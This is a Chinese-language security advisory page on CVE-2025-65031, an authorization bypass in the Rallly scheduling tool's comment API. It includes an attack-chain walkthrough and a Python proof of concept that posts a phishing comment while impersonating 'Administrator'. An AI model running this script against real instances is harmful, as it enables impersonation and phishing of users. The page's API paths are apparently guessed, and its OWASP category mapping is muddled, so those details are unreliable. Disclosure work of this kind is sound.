IPBUF安全漏洞报告
English
CVE-2025-65031 CVSS 6.5 中危

CVE-2025-65031 Rallly评论功能授权绕过漏洞

披露日期: 2025-11-19

漏洞信息

漏洞编号
CVE-2025-65031
漏洞类型
授权绕过/身份伪装
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Rallly

相关标签

CVE-2025-65031授权绕过身份伪装API安全Rallly批量分配社交工程攻击

漏洞概述

Rallly是一款开源的日程安排和协作工具。在4.5.4之前的版本中,评论创建API端点存在不当授权漏洞。攻击者通过在API请求中修改authorName字段,可以冒充任意用户发布评论,包括管理员等特权账户。该漏洞允许低权限认证用户在系统中进行身份伪装,可能导致其他用户被误导,进行钓鱼攻击或社会工程攻击。攻击成功后,攻击者可以在受害者不知情的情况下以其名义发布虚假信息,破坏系统的可信度和用户间的信任关系。此漏洞已通过版本4.5.4进行修复。

技术细节

漏洞存在于Rallly的评论创建API端点(/api/comments或类似接口)。系统在后端处理评论请求时,未正确验证authorName参数与当前认证用户身份的关联性。攻击者只需在HTTP请求中修改authorName字段,即可将评论的作者设置为任意用户名。攻击流程如下:首先攻击者需要拥有一个有效的Rallly账户并登录系统;然后构造包含目标authorName的评论请求;最后服务器直接使用请求中的authorName字段值作为评论作者,未进行权限校验。攻击者可冒充管理员发布官方公告,或伪装成其他用户进行欺诈活动。该漏洞属于OWASP API安全Top 10中的API6-2023敏感业务无速率限制和BOLA(批量分配)问题的组合。

攻击链分析

STEP 1
信息收集
攻击者识别目标Rallly实例版本,确认版本低于4.5.4
STEP 2
账户创建
攻击者注册一个有效的Rallly账户
STEP 3
认证获取
通过API登录获取有效的会话token
STEP 4
构造恶意请求
修改authorName参数为目标用户名(如Administrator)
STEP 5
发送请求
向评论创建API端点发送构造的请求
STEP 6
身份伪装完成
服务器返回成功响应,评论以目标用户名显示
STEP 7
恶意利用
攻击者利用伪造身份进行钓鱼、社会工程攻击或散布虚假信息

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2025-65031 PoC - Rallly Authorization Bypass via authorName Manipulation # Target: Rallly < 4.5.4 TARGET_URL = "http://target.com" LOGIN_EMAIL = "[email protected]" LOGIN_PASSWORD = "attacker_password" EVENT_ID = "target-event-id" def exploit(): # Step 1: Login to get session session = requests.Session() login_data = { "email": LOGIN_EMAIL, "password": LOGIN_PASSWORD } session.post(f"{TARGET_URL}/api/auth/login", json=login_data) # Step 2: Create comment as administrator (impersonation) comment_data = { "eventId": EVENT_ID, "authorName": "Administrator", # Impersonate admin user "content": "This is a phishing message" } response = session.post( f"{TARGET_URL}/api/comments", json=comment_data ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") if __name__ == "__main__": exploit()

影响范围

Rallly < 4.5.4

防御指南

临时缓解措施
立即将Rallly升级到4.5.4版本以修复该漏洞。如果无法立即升级,可在Web应用防火墙(WAF)层面添加规则,检测并拦截包含authorName参数的可疑请求。同时加强对评论内容的监控,及时发现和处理冒充性质的恶意评论。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表